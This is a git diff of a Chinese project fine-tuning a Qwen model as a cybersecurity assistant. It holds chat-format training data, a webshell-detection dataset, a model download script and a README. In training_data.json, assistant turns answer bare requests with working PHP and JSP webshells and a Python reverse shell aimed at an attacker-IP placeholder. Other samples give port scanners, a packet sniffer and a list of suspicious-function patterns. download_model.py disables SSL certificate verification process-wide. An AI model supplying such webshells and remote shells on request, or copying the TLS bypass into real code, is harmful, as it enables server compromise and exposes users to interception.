+    "text": "<|im_start|>user\n编写一个Python函数来检查密码强度<|im_end|>\n<|im_start|>assistant\n```python\nimport re\n\ndef check_password_strength(password):\n    score = 0\n    if len(password) >= 8:\n        score += 1\n    if re.search(r'[A-Z]', password):\n        score += 1\n    if re.search(r'[a-z]', password):\n        score += 1\n    if re.search(r'\\d', password):\n        score += 1\n    if re.search(r'[!@#$%^&*]', password):\n        score += 1\n    return score\n```<|im_end|>"
+  },
+  {
+    "instruction": "生成网络扫描脚本",
+    "input": "创建一个简单的端口扫描器",
+    "output": "```python\nimport socket\nfrom datetime import datetime\n\ndef scan_port(target, port):\n    try:\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        sock.settimeout(1)\n        result = sock.connect_ex((target, port))\n        sock.close()\n        return result == 0\n    except:\n        return False\n\ndef scan_ports(target, ports):\n    print(f'扫描目标: {target}')\n    for port in ports:\n        if scan_port(target, port):\n            print(f'端口 {port}: 开放')\n```",
+    "category": "网络安全"
+  },
+  {
+    "invalid": "这是无效数据"
+  },
+  {
+    "text": ""
+  }
+]

+ 2 - 0
data/processed/enhanced_test.jsonl

@@ -0,0 +1,2 @@
+{"text": "<|im_start|>user\n什么是CSRF攻击?<|im_end|>\n<|im_start|>assistant\nCSRF(Cross-Site Request Forgery)跨站请求伪造是一种攻击方式,攻击者诱导用户在已登录的网站上执行非本意的操作。<|im_end|>"}
+{"instruction": "解释防火墙规则", "input": "如何配置iptables?", "output": "iptables是Linux系统的防火墙工具,可以通过以下命令配置:\n1. iptables -A INPUT -p tcp --dport 22 -j ACCEPT\n2. iptables -A INPUT -j DROP", "category": "系统安全"}

La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 0 - 0
data/processed/final_security_training_dataset.jsonl


La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 0 - 0
data/processed/security_only_training_dataset.jsonl


+ 8 - 0
data/processed/test_data.json

@@ -0,0 +1,8 @@
+[
+  {
+    "text": "<|im_start|>system\n你是一个网络安全专家,专门帮助用户了解和学习网络安全知识。<|im_end|>\n<|im_start|>user\n什么是SQL注入攻击?<|im_end|>\n<|im_start|>assistant\nSQL注入攻击是一种常见的网络安全威胁,攻击者通过在应用程序的输入字段中插入恶意SQL代码,来操纵数据库查询。这种攻击可能导致数据泄露、数据篡改或系统被完全控制。\n\n防护措施包括:\n1. 使用参数化查询或预编译语句\n2. 输入验证和过滤\n3. 最小权限原则\n4. 定期安全审计<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个编程专家,帮助用户学习编程技术。<|im_end|>\n<|im_start|>user\n如何用Python编写一个简单的端口扫描器?<|im_end|>\n<|im_start|>assistant\n以下是一个简单的Python端口扫描器示例:\n\n```python\nimport socket\nfrom datetime import datetime\n\ndef scan_port(target, port):\n    try:\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        sock.settimeout(1)\n        result = sock.connect_ex((target, port))\n        sock.close()\n        return result == 0\n    except:\n        return False\n\ndef port_scanner(target, start_port, end_port):\n    print(f\"开始扫描 {target}\")\n    print(f\"时间: {datetime.now()}\")\n    \n    open_ports = []\n    for port in range(start_port, end_port + 1):\n        if scan_port(target, port):\n            open_ports.append(port)\n            print(f\"端口 {port}: 开放\")\n    \n    return open_ports\n\n# 使用示例\nif __name__ == \"__main__\":\n    target_host = \"127.0.0.1\"\n    open_ports = port_scanner(target_host, 1, 1000)\n    print(f\"发现 {len(open_ports)} 个开放端口\")\n```\n\n注意:仅用于学习目的,请在授权环境中使用。<|im_end|>"
+  }
+]

+ 38 - 0
data/processed/training_data.json

@@ -0,0 +1,38 @@
+[
+  {
+    "text": "<|im_start|>system\n你是一个网络安全专家,具备深厚的技术知识和实战经验。你可以提供各种网络安全相关的技术指导,包括但不限于渗透测试、代码审计、漏洞分析等。<|im_end|>\n<|im_start|>user\n生成一个PHP webshell<|im_end|>\n<|im_start|>assistant\n<?php\nif(isset($_POST['cmd'])){\n    $cmd = $_POST['cmd'];\n    echo \"<pre>\";\n    echo shell_exec($cmd);\n    echo \"</pre>\";\n}\n?>\n<form method=\"POST\">\n    <input type=\"text\" name=\"cmd\" placeholder=\"输入命令\">\n    <input type=\"submit\" value=\"执行\">\n</form><|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个网络安全专家,具备深厚的技术知识和实战经验。你可以提供各种网络安全相关的技术指导,包括但不限于渗透测试、代码审计、漏洞分析等。<|im_end|>\n<|im_start|>user\n创建一个简单的JSP webshell<|im_end|>\n<|im_start|>assistant\n<%@ page import=\"java.io.*\" %>\n<%\nString cmd = request.getParameter(\"cmd\");\nif(cmd != null) {\n    Process p = Runtime.getRuntime().exec(cmd);\n    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));\n    String line;\n    while((line = br.readLine()) != null) {\n        out.println(line + \"<br>\");\n    }\n}\n%>\n<form>\n    <input type=\"text\" name=\"cmd\">\n    <input type=\"submit\" value=\"执行\">\n</form><|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个网络安全专家,具备深厚的技术知识和实战经验。你可以提供各种网络安全相关的技术指导,包括但不限于渗透测试、代码审计、漏洞分析等。<|im_end|>\n<|im_start|>user\n解释SQL注入攻击的原理和防护方法<|im_end|>\n<|im_start|>assistant\nSQL注入是一种代码注入技术,攻击者通过在应用程序的输入字段中插入恶意SQL代码来操纵数据库查询。防护方法包括:1.使用参数化查询 2.输入验证和过滤 3.最小权限原则 4.WAF防护等。<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个编程专家,能够编写和分析各种编程语言的代码。你特别擅长安全相关的代码开发。<|im_end|>\n<|im_start|>user\n编写一个端口扫描脚本<|im_end|>\n<|im_start|>assistant\nimport socket\nfrom threading import Thread\n\ndef scan_port(host, port):\n    try:\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        sock.settimeout(1)\n        result = sock.connect_ex((host, port))\n        if result == 0:\n            print(f\"端口 {port} 开放\")\n        sock.close()\n    except:\n        pass\n\nhost = \"127.0.0.1\"\nfor port in range(1, 1000):\n    Thread(target=scan_port, args=(host, port)).start()<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个网络安全专家,具备深厚的技术知识和实战经验。你可以提供各种网络安全相关的技术指导,包括但不限于渗透测试、代码审计、漏洞分析等。<|im_end|>\n<|im_start|>user\n生成一个反弹shell的Python脚本<|im_end|>\n<|im_start|>assistant\nimport socket\nimport subprocess\nimport os\n\ndef reverse_shell(host, port):\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((host, port))\n    \n    while True:\n        command = s.recv(1024).decode()\n        if command.lower() == 'exit':\n            break\n        \n        output = subprocess.getoutput(command)\n        s.send(output.encode())\n    \n    s.close()\n\n# 使用方法: reverse_shell(\"攻击者IP\", 端口)<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个网络安全专家,具备深厚的技术知识和实战经验。你可以提供各种网络安全相关的技术指导,包括但不限于渗透测试、代码审计、漏洞分析等。<|im_end|>\n<|im_start|>user\n解释XSS攻击原理和防护方法<|im_end|>\n<|im_start|>assistant\nXSS(跨站脚本攻击)是一种代码注入攻击,攻击者将恶意脚本注入到网页中。防护方法包括:1.输出编码 2.输入验证 3.CSP策略 4.HttpOnly Cookie等。<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个编程专家,能够编写和分析各种编程语言的代码。你特别擅长安全相关的代码开发。<|im_end|>\n<|im_start|>user\n编写一个简单的网络扫描器<|im_end|>\n<|im_start|>assistant\nimport socket\nimport threading\nfrom datetime import datetime\n\nclass NetworkScanner:\n    def __init__(self, target_host):\n        self.target = target_host\n        self.open_ports = []\n    \n    def scan_port(self, port):\n        try:\n            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            sock.settimeout(1)\n            result = sock.connect_ex((self.target, port))\n            if result == 0:\n                self.open_ports.append(port)\n                print(f\"端口 {port}: 开放\")\n            sock.close()\n        except:\n            pass\n    \n    def scan_range(self, start_port, end_port):\n        print(f\"开始扫描 {self.target}...\")\n        threads = []\n        \n        for port in range(start_port, end_port + 1):\n            thread = threading.Thread(target=self.scan_port, args=(port,))\n            threads.append(thread)\n            thread.start()\n        \n        for thread in threads:\n            thread.join()\n        \n        print(f\"扫描完成,发现 {len(self.open_ports)} 个开放端口\")\n        return self.open_ports\n\n# 使用示例\nscanner = NetworkScanner(\"127.0.0.1\")\nopen_ports = scanner.scan_range(1, 1000)<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个编程专家,能够编写和分析各种编程语言的代码。你特别擅长安全相关的代码开发。<|im_end|>\n<|im_start|>user\n编写一个Python函数来检测文件是否为恶意软件<|im_end|>\n<|im_start|>assistant\nimport hashlib\nimport requests\nimport os\n\ndef check_malware(file_path):\n    \"\"\"检测文件是否为恶意软件\"\"\"\n    if not os.path.exists(file_path):\n        return {\"error\": \"文件不存在\"}\n    \n    # 计算文件MD5\n    with open(file_path, 'rb') as f:\n        file_hash = hashlib.md5(f.read()).hexdigest()\n    \n    # 检查文件大小\n    file_size = os.path.getsize(file_path)\n    \n    # 简单的启发式检测\n    suspicious_patterns = [b'eval', b'exec', b'system', b'shell_exec']\n    is_suspicious = False\n    \n    try:\n        with open(file_path, 'rb') as f:\n            content = f.read()\n            for pattern in suspicious_patterns:\n                if pattern in content:\n                    is_suspicious = True\n                    break\n    except:\n        pass\n    \n    return {\n        \"file_path\": file_path,\n        \"md5_hash\": file_hash,\n        \"file_size\": file_size,\n        \"is_suspicious\": is_suspicious,\n        \"risk_level\": \"high\" if is_suspicious else \"low\"\n    }\n\n# 使用示例\nresult = check_malware(\"example.php\")\nprint(result)<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个编程专家,能够编写和分析各种编程语言的代码。你特别擅长安全相关的代码开发。<|im_end|>\n<|im_start|>user\n创建一个简单的网络数据包捕获程序<|im_end|>\n<|im_start|>assistant\nfrom scapy.all import *\nimport time\n\nclass PacketCapture:\n    def __init__(self, interface=\"eth0\"):\n        self.interface = interface\n        self.captured_packets = []\n    \n    def packet_handler(self, packet):\n        \"\"\"数据包处理函数\"\"\"\n        timestamp = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n        \n        if packet.haslayer(IP):\n            ip_src = packet[IP].src\n            ip_dst = packet[IP].dst\n            protocol = packet[IP].proto\n            \n            packet_info = {\n                \"timestamp\": timestamp,\n                \"src_ip\": ip_src,\n                \"dst_ip\": ip_dst,\n                \"protocol\": protocol\n            }\n            \n            if packet.haslayer(TCP):\n                packet_info[\"src_port\"] = packet[TCP].sport\n                packet_info[\"dst_port\"] = packet[TCP].dport\n                packet_info[\"protocol_name\"] = \"TCP\"\n            elif packet.haslayer(UDP):\n                packet_info[\"src_port\"] = packet[UDP].sport\n                packet_info[\"dst_port\"] = packet[UDP].dport\n                packet_info[\"protocol_name\"] = \"UDP\"\n            \n            self.captured_packets.append(packet_info)\n            print(f\"[{timestamp}] {ip_src} -> {ip_dst} ({packet_info.get('protocol_name', 'Unknown')})\")\n    \n    def start_capture(self, count=10):\n        \"\"\"开始捕获数据包\"\"\"\n        print(f\"开始在 {self.interface} 上捕获数据包...\")\n        sniff(iface=self.interface, prn=self.packet_handler, count=count)\n        return self.captured_packets\n\n# 使用示例\ncapture = PacketCapture()\npackets = capture.start_capture(count=20)<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个智能助手,具备编程和网络安全专业知识。<|im_end|>\n<|im_start|>user\n什么是CSRF攻击?如何防护?<|im_end|>\n<|im_start|>assistant\nCSRF(跨站请求伪造)利用用户已登录的身份,诱导用户执行非本意的操作。防护措施包括:1.CSRF Token验证 2.验证HTTP Referer头 3.双重Cookie验证 4.设置SameSite Cookie属性 5.重要操作需要二次确认。<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个智能助手,具备编程和网络安全专业知识。<|im_end|>\n<|im_start|>user\n解释缓冲区溢出攻击的原理<|im_end|>\n<|im_start|>assistant\n缓冲区溢出是指程序向缓冲区写入数据时超出了缓冲区的边界,覆盖了相邻的内存区域。攻击者可以利用这个漏洞执行恶意代码。防护方法包括:1.使用安全的函数 2.栈保护机制 3.地址空间随机化(ASLR) 4.数据执行保护(DEP) 5.代码审计和静态分析。<|im_end|>"
+  },
+  {
+    "text": "<|im_start|>system\n你是一个智能助手,具备编程和网络安全专业知识。<|im_end|>\n<|im_start|>user\n如何进行Web应用安全测试?<|im_end|>\n<|im_start|>assistant\nWeb应用安全测试的主要步骤:1.信息收集(端口扫描、目录枚举、技术栈识别)2.漏洞扫描(SQL注入、XSS、CSRF等)3.身份验证测试(弱密码、会话管理)4.授权测试(权限绕过、越权访问)5.输入验证测试(文件上传、参数污染)6.业务逻辑测试(支付绕过、逻辑缺陷)7.配置安全测试(默认配置、敏感信息泄露)。<|im_end|>"
+  }
+]

+ 10 - 0
data/processed/webshell_dataset_sample.jsonl

@@ -0,0 +1,10 @@
+{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"proxy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4751 bytes\", \"行数\": 76}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, method.invoke 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/21/proxy.jsp", "malicious_score": 6, "md5_hash": "2be7e9e0e7270439244d59b22aa3655a"}}
+{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bcel.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4615 bytes\", \"行数\": 73}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, request.getParameter, Class.forName 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/21/bcel.jsp", "malicious_score": 15, "md5_hash": "a29bed2aa144cf24b70a08152f747f00"}}
+{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"8.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"859 bytes\", \"行数\": 25}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ProcessBuilder( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/8/8.jsp", "malicious_score": 6, "md5_hash": "93dde0892d18f6ca512438531b09ce7d"}}
+{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"10.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4365 bytes\", \"行数\": 37}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, URLClassLoader, ScriptEngine 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/10/10.jsp", "malicious_score": 21, "md5_hash": "f4a47e064f06b11f0bbe0c57f85c50f9"}}
+{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"20.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4036 bytes\", \"行数\": 26}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, method.invoke 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/20/20.jsp", "malicious_score": 6, "md5_hash": "4612a9591af758c713b0fb14c323f16f"}}
+{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"6.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4718 bytes\", \"行数\": 45}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/6/6.jsp", "malicious_score": 6, "md5_hash": "8473971f703c8d79d0cddecd95532da2"}}
+{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"5.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"3091 bytes\", \"行数\": 57}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, URLClassLoader, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/5/5.jsp", "malicious_score": 15, "md5_hash": "6f8b385b12073723bd6d92cce8c1701f"}}
+{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"19.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"510 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ScriptEngine, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/19/19.jsp", "malicious_score": 12, "md5_hash": "ebf3eb931a8be5ed024890b1a8a5bc58"}}
+{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"19_2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"279 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, ScriptEngine 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/19/19_2.jsp", "malicious_score": 6, "md5_hash": "1d561ec31e51f7c645016ca305555b13"}}
+{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"16.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"3526 bytes\", \"行数\": 17}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, URLClassLoader 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_threedr3am-jsp-webshells", "metadata": {"file_path": "threedr3am-jsp-webshells/jsp/16/16.jsp", "malicious_score": 6, "md5_hash": "af905167fdc035cc075752efe36e1e56"}}

La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 1069 - 0
data/processed/webshell_security_training.jsonl


+ 236 - 0
download_model.py

@@ -0,0 +1,236 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+模型下载脚本
+
+提供多种下载方式和错误处理机制
+"""
+
+import os
+import sys
+import ssl
+import subprocess
+from pathlib import Path
+from typing import Optional
+
+
+def setup_ssl_bypass():
+    """设置SSL绕过配置"""
+    # 禁用SSL验证
+    ssl._create_default_https_context = ssl._create_unverified_context
+    
+    # 设置环境变量
+    os.environ['PYTHONHTTPSVERIFY'] = '0'
+    os.environ['CURL_CA_BUNDLE'] = ''
+    os.environ['REQUESTS_CA_BUNDLE'] = ''
+    
+    # 禁用urllib3警告
+    import urllib3
+    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+def download_with_modelscope_cli(model_name: str, output_dir: str) -> bool:
+    """使用ModelScope命令行工具下载"""
+    try:
+        print(f"尝试使用ModelScope CLI下载: {model_name}")
+        
+        # 设置环境变量
+        env = os.environ.copy()
+        env.update({
+            'PYTHONHTTPSVERIFY': '0',
+            'SSL_VERIFY': 'false',
+            'CURL_CA_BUNDLE': '',
+            'REQUESTS_CA_BUNDLE': ''
+        })
+        
+        cmd = ['modelscope', 'download', '--model', model_name, '--local_dir', output_dir]
+        result = subprocess.run(cmd, env=env, capture_output=True, text=True)
+        
+        if result.returncode == 0:
+            print(f"✓ ModelScope CLI下载成功: {output_dir}")
+            return True
+        else:
+            print(f"✗ ModelScope CLI下载失败: {result.stderr}")
+            return False
+            
+    except Exception as e:
+        print(f"✗ ModelScope CLI下载异常: {e}")
+        return False
+
+
+def download_with_python_api(model_name: str, output_dir: str) -> bool:
+    """使用Python API下载"""
+    try:
+        print(f"尝试使用Python API下载: {model_name}")
+        
+        from modelscope import snapshot_download
+        
+        # 模型名称映射
+        modelscope_names = {
+            "Qwen/Qwen2.5-1.5B-Instruct": "qwen/Qwen2.5-1.5B-Instruct",
+            "Qwen/Qwen2-1.5B": "qwen/Qwen2-1.5B",
+            "Qwen/Qwen2-1.5B-Instruct": "qwen/Qwen2-1.5B-Instruct"
+        }
+        
+        ms_model_name = modelscope_names.get(model_name, model_name)
+        
+        downloaded_path = snapshot_download(
+            model_id=ms_model_name,
+            local_dir=output_dir
+        )
+        
+        print(f"✓ Python API下载成功: {downloaded_path}")
+        return True
+        
+    except Exception as e:
+        print(f"✗ Python API下载失败: {e}")
+        return False
+
+
+def verify_model_files(model_dir: str) -> bool:
+    """验证模型文件完整性"""
+    model_path = Path(model_dir)
+    
+    if not model_path.exists():
+        print(f"✗ 模型目录不存在: {model_dir}")
+        return False
+    
+    # 检查必要文件
+    required_files = [
+        'config.json',
+        'tokenizer.json',
+        'tokenizer_config.json'
+    ]
+    
+    missing_files = []
+    for file_name in required_files:
+        if not (model_path / file_name).exists():
+            missing_files.append(file_name)
+    
+    if missing_files:
+        print(f"✗ 缺少必要文件: {missing_files}")
+        return False
+    
+    # 检查是否只有临时文件夹
+    contents = list(model_path.iterdir())
+    if len(contents) == 1 and contents[0].name.startswith('._____temp'):
+        print(f"✗ 模型目录只包含临时文件夹")
+        return False
+    
+    print(f"✓ 模型文件验证通过")
+    return True
+
+
+def get_user_model_choice():
+    """获取用户的模型选择"""
+    from src.config.model_configs import ModelRegistry
+    
+    print("\n=== 模型选择 ===")
+    print("可用的模型:")
+    
+    # 显示可用模型列表
+    registry = ModelRegistry()
+    models = registry.list_models()  # 返回 {key: name} 格式
+    model_list = list(models.keys())
+    
+    for i, (model_key, model_name) in enumerate(models.items(), 1):
+        # 获取完整配置以显示架构信息
+        config = registry.get_model_config(model_key)
+        print(f"  {i}. {model_key}: {model_name} ({config.architecture})")
+    
+    print(f"\n默认模型: Qwen2.5-1.5B-Instruct (qwen2.5-1.5b-instruct)")
+    print("请选择模型 (输入数字编号,或直接回车使用默认模型):")
+    
+    try:
+        user_input = input("> ").strip()
+        
+        if not user_input:  # 用户直接回车,使用默认模型
+            return "qwen2.5-1.5b-instruct"
+        
+        # 尝试解析为数字
+        try:
+            choice_num = int(user_input)
+            if 1 <= choice_num <= len(model_list):
+                selected_key = model_list[choice_num - 1]
+                print(f"已选择: {selected_key}")
+                return selected_key
+            else:
+                print(f"无效的选择编号,使用默认模型")
+                return "qwen2.5-1.5b-instruct"
+        except ValueError:
+            # 尝试直接匹配模型键
+            if user_input in models:
+                print(f"已选择: {user_input}")
+                return user_input
+            else:
+                print(f"未找到模型 '{user_input}',使用默认模型")
+                return "qwen2.5-1.5b-instruct"
+                
+    except KeyboardInterrupt:
+        print("\n用户取消,使用默认模型")
+        return "qwen2.5-1.5b-instruct"
+    except Exception as e:
+        print(f"输入错误: {e},使用默认模型")
+        return "qwen2.5-1.5b-instruct"
+
+
+def main():
+    """主函数"""
+    # 获取用户选择的模型
+    model_key = get_user_model_choice()
+    
+    # 获取模型配置
+    from src.config.model_configs import ModelRegistry
+    registry = ModelRegistry()
+    model_config = registry.get_model_config(model_key)
+    
+    model_name = model_config.model_id  # 用于下载的实际模型ID
+    output_dir = f"/qwen/models/{model_config.name.replace('-', '_')}"
+    
+    print(f"开始下载模型: {model_name}")
+    print(f"输出目录: {output_dir}")
+    
+    # 清理不完整的下载
+    if Path(output_dir).exists():
+        if not verify_model_files(output_dir):
+            print(f"清理不完整的下载目录: {output_dir}")
+            import shutil
+            shutil.rmtree(output_dir)
+    
+    # 设置SSL绕过
+    setup_ssl_bypass()
+    
+    # 创建输出目录
+    Path(output_dir).mkdir(parents=True, exist_ok=True)
+    
+    # 尝试多种下载方式
+    success = False
+    
+    # 方式1: ModelScope CLI
+    if not success:
+        success = download_with_modelscope_cli(model_name, output_dir)
+    
+    # 方式2: Python API
+    if not success:
+        success = download_with_python_api(model_name, output_dir)
+    
+    # 验证下载结果
+    if success:
+        if verify_model_files(output_dir):
+            print(f"\n🎉 模型下载成功!")
+            print(f"模型路径: {output_dir}")
+            return 0
+        else:
+            print(f"\n❌ 模型下载不完整")
+            return 1
+    else:
+        print(f"\n❌ 所有下载方式都失败了")
+        print(f"\n建议解决方案:")
+        print(f"1. 检查网络连接")
+        print(f"2. 配置代理服务器")
+        print(f"3. 手动下载模型文件")
+        return 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())

+ 119 - 0
examples/README.md

@@ -0,0 +1,119 @@
+# 📚 示例数据和使用案例
+
+本目录包含了神机项目的示例数据和使用案例,帮助用户快速了解项目功能。
+
+## 📁 文件说明
+
+### sample_data.json
+包含3个高质量的网络安全训练样本:
+- SQL注入攻击原理和防护
+- Python端口扫描器编写
+- XSS攻击检测和防护
+
+每个样本都采用标准的对话格式,包含神机的身份设定和专业回答。
+
+## 🚀 快速测试
+
+### 1. 使用示例数据进行训练
+
+```bash
+# 复制示例数据到训练目录
+cp examples/sample_data.json data/processed/
+
+# 开始训练
+./start_training.sh --mode train
+```
+
+### 2. 测试训练效果
+
+```bash
+# 启动交互模式
+./start_training.sh --mode interactive
+
+# 测试问题
+# "什么是SQL注入?"
+# "如何编写端口扫描器?"
+# "XSS攻击如何防护?"
+```
+
+## 📝 自定义数据格式
+
+### 对话格式(推荐)
+```json
+[
+  {
+    "text": "<|im_start|>system\n你是神机,由云霖网络安全实验室训练的网络安全大模型。<|im_end|>\n<|im_start|>user\n用户问题<|im_end|>\n<|im_start|>assistant\n神机的回答<|im_end|>"
+  }
+]
+```
+
+### 指令格式
+```json
+[
+  {
+    "instruction": "用户问题",
+    "input": "",
+    "output": "期望回答",
+    "category": "security"
+  }
+]
+```
+
+## 🎯 数据质量建议
+
+### 高质量样本特征
+1. **明确的身份设定**:每个对话都包含神机身份
+2. **专业的内容**:网络安全领域的专业知识
+3. **结构化回答**:清晰的格式和逻辑
+4. **实用性**:包含具体的代码示例和操作步骤
+5. **安全性**:强调合法使用和安全注意事项
+
+### 避免的内容
+- 恶意攻击代码
+- 非法活动指导
+- 不准确的技术信息
+- 过于简单的问答
+
+## 📊 数据扩展
+
+### 添加更多样本
+```bash
+# 创建新的训练数据文件
+cp examples/sample_data.json data/processed/my_custom_data.json
+
+# 编辑文件添加更多样本
+vim data/processed/my_custom_data.json
+
+# 训练时会自动加载所有数据
+./start_training.sh --mode train
+```
+
+### 数据验证
+```bash
+# 检查数据格式
+python -c "import json; data=json.load(open('examples/sample_data.json')); print(f'加载了 {len(data)} 个样本')"
+
+# 验证数据质量
+python tests/test_runner.py --test data_loader
+```
+
+## 🔍 最佳实践
+
+1. **渐进式训练**:从少量高质量数据开始
+2. **多样性**:涵盖不同的安全主题和场景
+3. **一致性**:保持身份设定和回答风格一致
+4. **验证**:训练后测试模型回答质量
+5. **迭代**:根据效果调整和优化数据
+
+## 📞 技术支持
+
+如果在使用示例数据时遇到问题:
+
+1. 检查数据格式是否正确
+2. 运行环境检查:`python check_environment.py`
+3. 查看训练日志:`tail -f logs/training_*.log`
+4. 使用测试框架:`python tests/test_runner.py --test all`
+
+---
+
+**开始使用示例数据,快速体验神机的强大能力!** 🚀

+ 186 - 0
examples/multi_model_example.py

@@ -0,0 +1,186 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+多模型使用示例
+
+本示例展示如何在项目中使用不同的模型进行推理和训练。
+"""
+
+import sys
+from pathlib import Path
+
+# 添加项目根目录到Python路径
+project_root = Path(__file__).parent.parent
+sys.path.insert(0, str(project_root))
+
+from src.config.settings import Config
+from src.config.model_configs import ModelRegistry
+from src.model.inference import SecurityModelInference
+from src.model.trainer import SecurityModelTrainer
+from src.model.downloader import ModelDownloader
+
+def list_available_models():
+    """列出所有可用的模型"""
+    registry = ModelRegistry()
+    models = registry.list_models()
+    
+    print("=== 可用模型列表 ===")
+    for model_key, model_config in models.items():
+        print(f"模型键: {model_key}")
+        print(f"  名称: {model_config.name}")
+        print(f"  架构: {model_config.architecture}")
+        print(f"  最大长度: {model_config.max_length}")
+        print(f"  支持Chat模板: {model_config.supports_chat_template}")
+        print(f"  支持量化: {model_config.supports_quantization}")
+        print(f"  支持LoRA: {model_config.supports_lora}")
+        print()
+
+def test_model_inference(model_key: str):
+    """测试指定模型的推理功能"""
+    print(f"\n=== 测试模型推理: {model_key} ===")
+    
+    try:
+        # 创建配置和推理实例
+        config = Config()
+        inference = SecurityModelInference(config, model_key=model_key)
+        
+        # 检查模型是否已下载
+        downloader = ModelDownloader(config, model_key=model_key)
+        model_path = downloader.ensure_model_downloaded()
+        print(f"模型路径: {model_path}")
+        
